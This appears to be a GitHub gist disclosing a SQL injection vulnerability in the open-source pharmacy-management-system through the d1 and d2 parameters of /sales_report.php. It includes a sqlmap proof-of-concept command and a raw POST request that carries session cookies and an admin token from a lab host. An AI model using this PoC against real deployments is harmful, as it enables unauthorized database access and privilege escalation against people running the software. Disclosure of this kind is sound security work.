Skip to content

Instantly share code, notes, and snippets.

@topsky979

topsky979/pharmacy-management-system_SQL_INJECTION_1.md Secret

Last active July 23, 2024 03:28
Show Gist options
  • Save topsky979/5d2d9104dc4dd7f5dda99cbbd615a0b8 to your computer and use it in GitHub Desktop.
Save topsky979/5d2d9104dc4dd7f5dda99cbbd615a0b8 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
pharmacy-management-system_SQL_INJECTION_1.md

[description]

pharmacy-management-system was discovered to contain a SQL Injection vulnerability via the URI /sales_report.php.

[Vulnerability Type]

SQL Injection

[Vendor of Product]

pharmacy-management-system,https://github.com/krishna9772/pharmacy-management-system

[Affected Product Code Base]

commit<=a2efc8442931ec9308f3b4cf4778e5701153f4e5

[Impact Escalation of Privileges]

true

[POC] sqlmap commands:

sqlmap -r a.txt -p d1 -p d2 --batch --banner --flush-session

a.txt

POST /sales_report.php?invoice_number=RS-3920900 HTTP/1.1
Host: 192.168.0.183:11180
Content-Length: 35
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.183:11180
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.183:11180/sales_report.php?invoice_number=RS-3920900
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: i18next=en; Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImU0ZjJhZWJmLWVkMDEtNGM0OC04YjU4LTI3OTFjMzllMzFmMCJ9.0J-cqM7f9-cNNDe8_Q3CAiWkq4iyNqLDbBUh6mnYfRl1Ygv4HPIp3Ky1cbbpN3_4Zr8lYluJ5-nEunFvF84Xyw; sidebarStatus=0; pro_end=-1; ltd_end=-1; serverType=nginx; order=id%20desc; memSize=32012; sites_path=/www/wwwroot; distribution=ubuntu; force=0; load_type=null; uploadSize=1073741824; rank=a; form_proxy=%5Bobject%20Object%5D; backup_path=/www/backup; pnull=1; load_page=1; _ga=GA1.1.2111016145.1721287966; _ga_J1DQF09WZC=GS1.1.1721287966.1.1.1721292532.0.0.0; weberp_installation=li98qb9dmcjbkupdsthditlpb3; files_sort=name; showRow=2000; Module=AP; PHPSESSIDwebERPteam=hnbgetkfg5o9mdts1ul0tt7a92; BatchPaste=2; name_reverse=True; SESSIONID=c5a998ac-ac1a-4102-962c-14f81e5eaa7d.JwnPi9EhaYyZfpOkyruZnGmLVBQ; request_token=wWTYlCvGWOyw1n0ms4ax4jl6ZBogX70mIk1wC4M9vZXHnFgO; copyFileName=null; is_admin=false; layers=5; BatchSelected=null; cutFileName=null; load_search=undefined; tyson=ngf9r926d6t1iddic9simtdt8kouu6up; vcodesum=3; Path=/www/wwwroot/111.com; PHPSESSID=br11orm7m3b7qqksr2ie4tk2gj
Connection: keep-alive

d1=2024-07-23&d2=2024-07-18&submit=%

图片

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment